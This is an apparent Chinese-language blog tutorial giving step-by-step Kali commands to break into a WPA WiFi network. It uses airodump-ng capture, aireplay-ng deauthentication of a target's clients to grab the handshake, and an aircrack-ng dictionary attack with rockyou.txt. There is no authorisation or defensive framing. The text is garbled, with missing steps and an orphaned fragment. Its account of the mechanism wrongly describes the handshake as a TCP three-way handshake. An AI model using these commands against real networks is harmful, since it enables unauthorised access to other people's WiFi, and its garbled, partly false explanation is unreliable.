前期 需要將kali安裝好,並且有無線網卡(注意kali支持芯片爲3070和1887L的網卡)
-
打開kali,打開終端,使用命令ifconfig查看網卡信息,若有wlan0表示網卡連接成功
,ESSID爲wifi的名稱,中文可能會有亂碼
-
airodump-ng wlan0mon–bssid BSSID -c 信道頻率 -w /抓包存儲的路徑/包名
-
新打開一個終端輸入 aireplay-ng -0 20 -a 目標機地址-c 連接目標機的地址 網卡名
當出現WPA handshake時,表示抓包成功
WiFi設備無限次數,-0 8則攻擊8次。攻擊原理是:先讓設備掉線,設備會再自動連接,併發這個自動連接過程會進行三次握手,會發送tcp包(裏面包含加密的密碼數據),我方僞裝成WiFi熱點去竊取該數據包。我方竊取後即可用字典窮舉法暴力破解加密的WiFi密碼,數據包裏面的密碼是哈希加密的,哈希加密只能正向)
終端可以按ctrl+C停止任務
7.抓到包後,就可以停止監聽了,
命令 airmon-ng stop wlan0mon
8.解壓自帶的密碼包,命令如下
gzip -d /usr/share/wordlists/rockyou.txt.gz
9.破解,使用命令
aircrack-ng -w 字典路徑 握手包路徑
(注意,兩路徑之間有空格)
例如:
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面/包名
10.若找不到文件,可按下方找找
![在這裏插入圖片描述]()
